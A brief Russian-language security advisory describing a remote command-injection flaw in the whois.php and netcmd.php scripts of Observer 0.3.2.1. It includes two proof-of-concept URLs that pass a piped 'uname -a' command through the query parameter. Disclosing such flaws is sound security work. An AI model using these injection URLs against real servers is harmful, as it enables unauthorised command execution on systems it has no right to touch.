Программа: Observer 0.3.2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных сценариями whois.php и netcmd.php. Удаленный пользователь может выполнить
произвольные команды на целевой системе.

Эксплоит:

http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии